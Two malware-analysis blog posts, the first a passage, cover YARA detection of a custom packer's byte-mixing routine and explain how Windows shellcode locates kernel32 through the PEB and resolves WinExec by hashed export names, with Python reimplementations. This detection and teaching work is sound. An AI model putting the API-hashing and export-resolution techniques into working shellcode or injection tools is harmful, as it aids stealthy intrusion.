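def passes_cheap_gates(data: bytes, max_size: int = 2 * 1024 * 1024, max_sections: int = 6) -> bool:
    """Size and section-count gates (placeholder thresholds) to run before costly byte matching."""
    sections = pe_section_count(data)
    return sections is not None and len(data) <= max_size and sections <= max_sections


# Minimal fake header for demonstration: e_lfanew = 0x40, then "PE\0\0" and the start of a COFF header.
fake = bytearray(0x80)
fake[:2] = b"MZ"
struct.pack_into("<I", fake, 0x3C, 0x40)
fake[0x40:0x44] = b"PE\x00\x00"
struct.pack_into("<HH", fake, 0x44, 0x014C, 4)   # Machine = i386, NumberOfSections = 4
print(pe_section_count(bytes(fake)), passes_cheap_gates(bytes(fake)))
```

    The point of the ordering is cost: these checks read a handful of header bytes, so files that fail them never reach the opcode patterns.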

    Figure 20. VirusTotal Livehunt Retrohunt editor for authoring YARA rules and running historical hunts across selected corpora and time ranges. Source: docs.virustotal.com

    When the grep finally stays quiet, the rule graduates to its real exam: Retrohunt. But it doesn’t run just once. The exact same YARA is executed twice, against two very different populations. The first run goes against a goodware-biased corpus, where the only thing you’re testing is restraint—does the rule remain silent in a world full of installers, signed binaries, and boring software that just does its job? The second run goes against VirusTotal’s default corpus, where the noise returns and the question flips. Now you’re looking to see what else lights up. Not clones of your sample, but binaries that carry the same decryptor logic buried under different skins. At this stage, you’re no longer asking whether the rule works. You’re asking whether it understands the behavior it’s trying to describe.

    A good rule begins to surface siblings that reuse the same routine, even if everything else around it has shifted. A weak rule just describes one binary very precisely and nothing more. Retro hunts make that difference obvious very quickly. If you want to dig deeper into how VirusTotal’s Retrohunt works and how to run these searches effectively, the official documentation covers it in detail: https://docs.virustotal.com/docs/retrohunt.

    Alongside this external testing, it’s worth remembering that most security teams aren’t relying on VirusTotal alone. AV vendors, EDR teams, and internal detection groups usually run their own quality gates before anything ships. Rules get exercised against large cleanware corpora, regression sets, and performance testbeds to make sure they don’t light up on legitimate software or introduce scan-time overhead. False positives and slow rules are caught long before production.

    Retro hunts are a way to sanity-check intent and coverage from the outside. Internal QA systems exist to do the unglamorous work at scale—proving that a rule is quiet, fast, and safe once it leaves the lab.

    Custom Packer Logic: Payload Decryption Rule

    Up to this point, everything we’ve seen has lived in the world of string decryption: small, repeatable routines cleaning up literals just in time for use. This block is where the scope changes. During initial static analysis in Detect It Easy, the resource section already stood out as compressed, so when main drops into a run of FindResource → LoadResource → LockResource calls, it’s a natural place to stop and look closer. What’s being pulled here isn’t just data. It’s a packed payload lifted straight out of .rsrc, staged in memory, and processed inside a do { … } while (…) loop via repeated calls to sub_401560, which chews through the buffer chunk by chunk. The final pass happens in sub_40AC60, which turns the extracted resource into its usable form. This is the point where the packer moves beyond string cleanup and reconstructs the real body of the sample.

    Figure 21. Native loader lifting an encrypted payload from resources and rebuilding it in memory.

    Figure 22. Final unpacking stage: sub_40AC60 reconstructs a .NET PE payload in memory, with EDI pointing at the newly materialized output buffer.

    Even before we follow execution into sub_40AC60 (where the final payload transform lands), it’s worth pausing on sub_401560—because this is the “workhorse” that keeps getting hammered inside that do/while pipeline.

    At a high level, sub_401560 is a table-driven byte mixer. It copies the input buffer to an output buffer, then rewrites the bytes using a 256×256 lookup table (sitting at this + 0x10000). But it’s not a simple byte-substitution: each byte’s replacement is keyed off a neighbor byte (next/previous), plus a small seed value stored at this[131104] (byte offset 0x20020).

    • If the chunk is 1 byte, it does a single lookup keyed by that seed.
    • If it’s larger, it runs a forward pass (byte + next-byte), does a special keyed transform on the last byte (seed XOR 0x55), then runs a backward pass (byte + prev-byte), and finally rewrites the first byte using the seed.

    Net effect: it turns the buffer into a chained stream transform—each byte is influenced by its neighbors—so by the time we reach sub_40AC60, we’re not looking at “raw extracted resource data” anymore, we’re looking at something that’s already been aggressively stirred.
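
    The steps above can be sketched as follows. This is written from the prose description only, not from the decompiled code, so several details are assumptions: that the neighbor byte selects the table row, that each pass reads bytes already rewritten in place, and that the demo table is a simple additive one rather than the sample's real table.

```python
def mix(buf: bytes, table, seed: int) -> bytes:
    """Chained table transform: forward pass, keyed last byte, backward pass, keyed first byte."""
    out = bytearray(buf)                     # work on a copy, as the routine copies input to output
    n = len(out)
    seed &= 0xFF
    if n == 0:
        return bytes(out)
    if n == 1:
        out[0] = table[seed][out[0]]         # single byte: one lookup keyed by the seed
        return bytes(out)
    for i in range(n - 1):                   # forward pass: each byte keyed by the next byte
        out[i] = table[out[i + 1]][out[i]]
    out[n - 1] = table[seed ^ 0x55][out[n - 1]]   # last byte: keyed by seed XOR 0x55
    for i in range(n - 1, 0, -1):            # backward pass: each byte keyed by the previous byte
        out[i] = table[out[i - 1]][out[i]]
    out[0] = table[seed][out[0]]             # first byte rewritten using the seed
    return bytes(out)


# Hypothetical 256x256 table (row = key byte, column = input byte), used only for this demo.
demo_table = [[(b + k) & 0xFF for b in range(256)] for k in range(256)]

print(mix(b"\x01\x02\x03", demo_table, seed=0x10).hex())
```

    Even with a toy table, changing one input byte changes its neighbors' outputs too. That chaining is what makes the routine more than a plain substitution.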

    Figure 23. The IDA pseudocode for sub_401560 showing the chained mixing behavior.

    Figure 24. Python reimplementation of sub_401560, applying a chained 256×256 table-driven byte transform to an input buffer.

    What stands out about sub_401560 is that it doesn’t look like any standard algorithm. The table lookups and neighbor-based chaining give it a very specific shape, which means the function itself is distinctive. That makes it a solid candidate for YARA-based detection: not because it’s sophisticated crypto, but because it’s custom, repeatable, and easy to recognize once you know what to look for.

    Figure 25. Sample YARA rule illustrating opcode-level detection of the sub_401560 table-chained byte mixer.

    Let’s look at how this rule is put together. Rather than trying to describe the entire function byte-for-byte, the rule anchors itself on a few deliberate checkpoints that reflect intent. These anchors line up with the main stages of the transform: setup, forward mixing, a special last-byte step, and the backward mix. We’ll walk through the $head, $fwd, $last, and $bwd sequences in turn, and why each one was chosen.

    $head

    The opening bytes aren’t interesting because they save registers or set up a stack frame. They matter because of what happens immediately after. The function copies an input buffer with memcpy, checks the size, and branches early if the length is one byte.

    That combination—bulk copy followed by byte-wise handling—is the first signal that this isn’t a standard crypto primitive or library routine. The size check and conditional jump establish the structure of the function, while the register usage (edi as the table/state pointer, esi as the output buffer) stays consistent across builds.

    This anchor tells us what kind of routine we’re in before any mixing logic even begins.

    $fwd

    The forward pass is where the behavior becomes distinctive. Each byte is rewritten using a lookup that depends on the next byte, not just its own value. The sequence of movzx, add 0x100, shl 8, and indexed table access isn’t incidental math—it’s how the code walks a 256×256 lookup table.

    This pattern is unlikely to appear in benign code by accident, and it doesn’t resemble common encoders or stream ciphers. Anchoring here captures the neighbor-dependent mixing that defines the routine.
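
    The index arithmetic is worth checking by hand. In this sketch I assume the neighbor byte picks the row and the current byte picks the column, which is my reading of the instruction sequence rather than something the figure confirms.

```python
TABLE_BASE = 0x10000   # table offset from the object base, per the description of sub_401560
SEED_OFFSET = 0x20020  # seed location used by the last-byte step (131104 in decimal)


def table_offset(current: int, neighbor: int) -> int:
    """Byte offset of the table cell: ((neighbor + 0x100) << 8) + current."""
    return ((neighbor + 0x100) << 8) + current


lowest = table_offset(0x00, 0x00)
highest = table_offset(0xFF, 0xFF)
print(hex(lowest), hex(highest), highest - lowest + 1 == 256 * 256)
```

    Adding 0x100 before the shift is just a compact way of folding the 0x10000 table base into the row index. The resulting range covers exactly 256×256 bytes and ends below the seed offset.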

    $last

    The last byte is handled differently, and that difference is deliberate. Instead of using a neighboring byte, the code mixes in a fixed seed value read from [edi+0x20020], XORed with 0x55, before performing the table lookup.

    This isn’t cleanup logic or bounds handling—it’s a special case baked into the transform. That makes it a strong discriminator: seeing this exact sequence strongly suggests you’re looking at the same routine.

    $bwd

    The backward pass runs the same table logic again, but this time it walks the buffer in reverse, pulling in the previous byte instead of the next one. That’s what gives the routine its full shape: a forward sweep, a one-off tweak at the end, and then a second pass back through the data.

    Anchoring on this loop helps keep the rule honest. Plenty of code uses a single table-based pass; very little code does it twice, in opposite directions, with the same lookup mechanics. Requiring both $fwd and $bwd makes sure we’re matching the whole transform, not just a convenient slice of it.

    As mentioned earlier, the next stage is to start testing the rule. Run a quick grep-style search, follow it up with a retrohunt to see what else the rule pulls in, and validate it against cleanware. From there, adjust the anchors, wildcards, and conditions as needed to balance performance and false positives before using it in any real pipeline.

    Detection Considerations for Non-Custom Packers

    This kind of opcode-level logic does not translate directly to common, non-custom packers like UPX, ASPack, or similar tools that are routinely used by legitimate software. Writing a static YARA rule against the unpacking stub of these packers will almost always produce false positives, because the stub is shared across thousands of clean binaries.

    In those cases, the packer itself is not the signal. It only becomes relevant when it’s paired with malicious behavior downstream.

    To handle this, most AV and EDR engines don’t scan the packed bytes in isolation. Instead, they unpack the file first—either through emulation or during execution—and then apply static and behavioral detection to the unpacked code. That’s where rules become meaningful: they match on the post-unpack logic, not the generic wrapper.

    The trade-off is performance. Unpacking, emulating, and rescanning code is significantly heavier than a straight static scan. Engines have to decide when that cost is justified, which is why generic packers are usually tolerated unless other signals push the file down a deeper inspection path.

    Custom packers don’t get that treatment. Their unpacking logic is unique, reusable across samples, and tightly coupled to the malware itself—making function-level static detection both safer and cheaper in comparison.

    We’ll stop here for now. Part 2 will look at detection once known encryption algorithms replace custom routines.

    References

    VirusTotal Documentation – https://docs.virustotal.com/

    YARA Documentation – https://yara.readthedocs.io/en/latest/

    VirusShare – https://virusshare.com/

  • Shellcode 101: A Beginner’s Guide to Windows Shellcode

    Author: Valli-Nayagam Chokkalingam

    Instead of walking through shellcode generation, this post explains how shellcode executes, why it is position independent, and what that means in practice.

    Contents

    Starting With Something Familiar

    On Windows, running a program is usually uneventful. There’s a file on disk, you double-click it, and the application shows up. A window opens, something visible happens, and you don’t really think about it any further.

    Even when a program does almost nothing—like opening Notepad or Calculator—the flow feels obvious. The executable runs, the OS takes over, and the result appears. Whatever happens in between is mostly invisible, and most of the time that’s fine.

    That “normal” experience quietly sets expectations. We get used to the idea that programs start from files, that the operating system handles the heavy lifting, and that execution just works because everything is already in place. For this post, that familiar model is the starting point—not because it’s interesting, but because it’s the set of assumptions everything else will eventually break.

    Figure 1. Execution of a custom Windows executable resulting in the launch of notepad.exe as a visible indicator of successful code execution.

    A Simple Program That Launches an Application

    The executable shown in Figure 1 does one straightforward thing: it launches notepad.exe and exits. There’s no complex logic and no visible setup. The corresponding code, shown in Figure 2, reflects that simplicity.

    That simplicity is misleading. By the time this program runs, a lot has already happened. A process exists, memory has been prepared, and system functionality is ready to be used. The program can make a single request and expect it to work because it is running inside an environment that has already been set up.

    None of that setup appears in the code. There’s no handling for how the executable is loaded, how dependencies are resolved, or how execution is initialized. Those details are handled elsewhere, allowing the program to stay small and readable. Understanding where that work happens—and what assumptions it creates—is the next step.

    Figure 2. C source code of the custom executable responsible for launching notepad.exe.

    What Windows Does for an Executable Behind the Scenes

    Launching an executable doesn’t mean Windows immediately starts running its code. The file is first treated as something that needs to be understood and prepared.

    When you run Launch Notepad.exe (Figure 1), it doesn’t start instantly. Behind the scenes, the loader performs several setup steps, illustrated in Figure 3, to prepare the program for execution. Windows recognizes the file as a Portable Executable and maps it into memory in a structured way. Sections are placed where they belong, a process is created, and space is carved out for the program to run. At this point, nothing from the application itself has executed yet.

    Windows also deals with anything the program depends on. Required DLLs are loaded, and imported functions are resolved ahead of time. By the time execution reaches the program’s entry point, calls to system APIs already work. The code doesn’t need to locate them or check whether they exist.

    Most of this work stays out of sight, which is why it’s easy to forget it’s happening at all. A file on disk is turned into a running process with very little effort from the developer. Those guarantees are what normal Windows programs rely on—and they’re exactly the things that disappear once the loader and executable structure are no longer part of the picture.

    Figure 3. High-level view of the steps performed by Windows to load a Portable Executable into memory before execution begins.

    What If We Want the Result Without the Executable?

    Sometimes dropping an executable just isn’t worth the noise. Writing a payload to disk leaves a trail—something for EDR to watch, something for forensics to recover later. In Figure 4, the contrast is clear: a malware executable dropping Launch Notepad.exe to disk versus achieving the exact same result by executing shellcode injected into an existing process like explorer.exe.

    The outcome doesn’t change. Notepad still opens. What changes is how much machinery is involved. With shellcode, there’s no secondary executable, no loader for a new file, and no obvious payload artifact left behind. It’s just raw instructions placed directly into memory, executed where they land.

    By reusing a legitimate process and skipping the file drop entirely, execution blends into normal system activity. The functionality is identical, but the footprint is smaller and the signal is quieter. That difference is why shellcode exists—and why attackers keep reaching for it.

    Figure 4. Comparison of executable-based and shellcode-based execution paths leading to the same result.

    Execution Without a Loader

    As shown in Figure 3, normal execution on Windows flows through the loader. A file is read from disk, its structure is understood, memory is prepared, and only then does execution begin. That path is so common it feels invisible.

    Shellcode steps outside of it. There is no executable file to load and no loader preparing the ground first. The operating system never treats the code as a program. Execution starts directly from memory, wherever those instructions happen to be placed.

    That difference matters. Without the loader, there’s no structured layout waiting in memory and no guarantees about what’s available. The code runs inside an existing process context and works with whatever state already exists there. Nothing is resolved ahead of time.

    Figure 5 shows this contrast clearly. On one side, execution depends on the loader to turn a file into something runnable. On the other, execution happens without that preparation step at all. The result can look the same from the outside, but the path taken to get there is very different.

    This is the tradeoff shellcode accepts. Less structure. Less comfort. But also less surface area. By avoiding the loader entirely, execution becomes quieter, and that shift is what defines running without one.

    Figure 5. Comparison of loader-based execution and direct execution from memory.

    Why Shellcode Cannot Rely on Structure or Location

    Shellcode doesn’t start life as a program. When execution begins, it’s already inside a process, dropped into memory with none of the usual guarantees in place.

    The first point of entry is shown in Figure 6. This is where control reaches the shellcode. There are no imports to lean on and no fixed addresses to trust. The code begins by setting up a small working state and deciding what it needs to find next. One of the first things prepared is a hash identifying the module it wants to locate.

    Next comes the module lookup, shown in Figure 7. Here, the shellcode walks the loader structures exposed through the PEB. Each loaded module is checked in turn. A hash match identifies the module and yields its base address. In this case, that module is kernel32.dll. This replaces what the loader normally does when it maps dependent DLLs.

    Figure 6. High-level view of the shellcode routine: locating kernel32.dll, resolving WinExec, and invoking it with stack-based arguments.

    Figure 7. Shellcode traversing loader-linked module data via the PEB to identify the target DLL using a hashed name comparison.
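    The hashed name comparison can be sketched outside of assembly. The snippet below is a minimal illustration, not a reconstruction of this sample: the post does not name the hashing routine, so a rotate-right-by-13 additive hash (a scheme often seen in shellcode) is assumed, along with lowercasing the name before hashing. The module list and base addresses are made-up stand-ins for the entries the shellcode would read through the PEB.

```python
from typing import List, Optional, Tuple


def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """ASSUMED hash: rotate right by 13, then add each lowercased byte."""
    h = 0
    for byte in name.lower().encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


# Hypothetical stand-in for the loader's module list: (name, base address).
LOADED_MODULES: List[Tuple[str, int]] = [
    ("ntdll.dll", 0x7FFA10000000),
    ("KERNEL32.DLL", 0x7FFA0F000000),
    ("user32.dll", 0x7FFA0E000000),
]


def find_module_base(modules: List[Tuple[str, int]], wanted_hash: int) -> Optional[int]:
    """Walk the module list and return the base of the first hash match."""
    for name, base in modules:
        if ror13_hash(name) == wanted_hash:
            return base
    return None


if __name__ == "__main__":
    wanted = ror13_hash("kernel32.dll")  # the shellcode embeds only this value
    base = find_module_base(LOADED_MODULES, wanted)
    print(f"hash={wanted:#010x} base={base:#x}")
```

    The point of the design is that the string "kernel32.dll" never has to appear in the shellcode itself. Only the precomputed 32-bit value is carried, and every module name encountered during the walk is hashed and compared against it.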

    Once the module base is known, execution still isn’t ready to transfer control anywhere meaningful. A loaded DLL doesn’t provide function addresses on its own. That work normally comes from the import table, and here it has to be reconstructed manually.

    Figure 8 shows the first half of that process. Using the base address of kernel32.dll, the shellcode walks the export directory directly. Exported function names are read from memory and processed one by one, each passed through the same hashing logic used earlier. This stage is about identification, not execution — narrowing down which export corresponds to the function the shellcode wants.

    Figure 9 picks up from there. Once the correct export name is identified (WinExec in this case), its position in the name table selects the matching entry in the ordinal table, and that ordinal is used to index into the address table. That final lookup yields the function’s RVA, which, added to the module base, gives the actual virtual address of the WinExec API. The shellcode now holds a real, callable address inside the target module.
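    The same name, ordinal, and address lookup can be reproduced in a few lines against a toy image. This is a sketch under stated assumptions: the field offsets follow the documented IMAGE_EXPORT_DIRECTORY layout, but the image itself is synthetic (no PE headers), the RVAs and base address are invented, and the rotate-right-by-13 hash is assumed because the post does not name the routine the sample uses.

```python
import struct
from typing import Optional, Tuple


def ror13_hash(name: bytes) -> int:
    """ASSUMED hash: rotate right by 13, then add each byte (32-bit)."""
    h = 0
    for byte in name:
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


def build_toy_image() -> Tuple[bytearray, int]:
    """Build a fake mapped image holding only an export directory."""
    image = bytearray(0x200)
    names = [b"Sleep", b"WinExec", b"lstrlenA"]   # name table (sorted)
    ordinals = [2, 0, 1]                          # name index -> address index
    func_rvas = [0x1111, 0x2222, 0x3333]          # address table (made-up RVAs)
    export_dir, functions, name_ptrs, ords, strings = 0x40, 0x80, 0xA0, 0xC0, 0x100
    struct.pack_into("<I", image, export_dir + 0x14, len(func_rvas))  # NumberOfFunctions
    struct.pack_into("<I", image, export_dir + 0x18, len(names))      # NumberOfNames
    # AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    struct.pack_into("<III", image, export_dir + 0x1C, functions, name_ptrs, ords)
    cursor = strings
    for i, name in enumerate(names):
        struct.pack_into("<I", image, functions + 4 * i, func_rvas[i])
        struct.pack_into("<I", image, name_ptrs + 4 * i, cursor)
        struct.pack_into("<H", image, ords + 2 * i, ordinals[i])
        image[cursor:cursor + len(name)] = name   # NUL terminator already present
        cursor += len(name) + 1
    return image, export_dir


def resolve_export(image: bytearray, base: int, export_dir: int, wanted: int) -> Optional[int]:
    """Hash each export name; on a match, map name -> ordinal -> RVA -> address."""
    count = struct.unpack_from("<I", image, export_dir + 0x18)[0]
    functions, name_ptrs, ords = struct.unpack_from("<III", image, export_dir + 0x1C)
    for i in range(count):
        name_rva = struct.unpack_from("<I", image, name_ptrs + 4 * i)[0]
        name = bytes(image[name_rva:image.index(b"\x00", name_rva)])
        if ror13_hash(name) != wanted:
            continue
        ordinal = struct.unpack_from("<H", image, ords + 2 * i)[0]
        func_rva = struct.unpack_from("<I", image, functions + 4 * ordinal)[0]
        return base + func_rva
    return None


if __name__ == "__main__":
    image, export_dir = build_toy_image()
    address = resolve_export(image, 0x10000000, export_dir, ror13_hash(b"WinExec"))
    print(f"WinExec resolved to {address:#x}")
```

    In a real module, the export directory RVA would come from the first data directory entry in the PE optional header. The toy image skips that step to keep the three-table lookup in focus.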

    By the time Figure 9 completes, the end result mirrors what an import table would normally provide. The address of WinExec is resolved and ready to be called, even though no executable structure was involved and the loader never ran. Figure 10 shows what this would have looked like in a conventional executable (Launch Notepad.exe), where the same API is resolved ahead of time and recorded explicitly in the import table instead of being rebuilt at runtime.

    Figure 8. Traversing the export directory of kernel32.dll to identify the target API name (WinExec) using hash comparison.

    Figure 9. Resolving the virtual address of WinExec by mapping the matched export name through its ordinal and address tables.

    Figure 10. Import table of the corresponding executable (Launch Notepad.exe), showing KERNEL32.dll and the WinExec API resolved by the loader.

    Why Shellcode Ends Up Being Assembly

    By this point, the form shellcode takes should already feel familiar. In Figures 6 through 9, IDA never shows a program in the usual sense. What’s visible is a direct disassembly of bytes sitting in memory.

    That’s not a tooling artifact. It’s the reality of what shellcode is.

    Shellcode doesn’t start life as a program Windows recognizes. There’s no file format to parse, no headers to interpret, and no symbols to resolve. A jump lands somewhere in memory, and from that moment on the only meaningful interpretation of those bytes is as CPU instructions.

    This is why everything we’ve examined lives at the instruction level. IDA isn’t reconstructing structure or intent in Figures 6, 7, 8, and 9. It’s simply translating raw opcodes into assembly, one instruction at a time. There’s nothing above that layer to rely on.

    Higher-level languages assume a loader, a runtime, and a stable execution context. Shellcode gets none of that. It executes where it lands, adapts to the process it’s in, and avoids assumptions about layout or location.

    Assembly fits those constraints cleanly. It’s explicit, position-independent, and honest about what the code is doing. When shellcode is disassembled, assembly isn’t a side effect; it’s the code in its most direct form.

    Proof of Execution Without a Program

    At this point, execution isn’t something we infer. It’s something we can see.

    The screenshot in this section (Figure 11) shows the shellcode bytes resident inside the memory of explorer.exe. There is no executable on disk corresponding to this code. Nothing was launched, mapped, or registered as a program. The bytes exist only in memory, inside a process that was already running.

    Yet execution still occurred. The shellcode ran, resolved what it needed, and produced a visible result. That alone is the point being made here.

    This is what execution without a program looks like in practice. No file-backed image. No loader activity tied to a new process. Just instructions placed into memory and control transferred to them. From the operating system’s perspective, there is no new application to account for — only behavior happening inside an existing one.

    Seeing the bytes in memory closes the loop. It confirms that everything discussed earlier is not theoretical. The code ran where it was injected, using the context it found, without ever becoming a program in the conventional sense.

    Figure 11. Shellcode bytes executing from a private, executable memory region inside explorer.exe, without any loaded executable.

    That’s where we’ll leave it for now. More to come soon!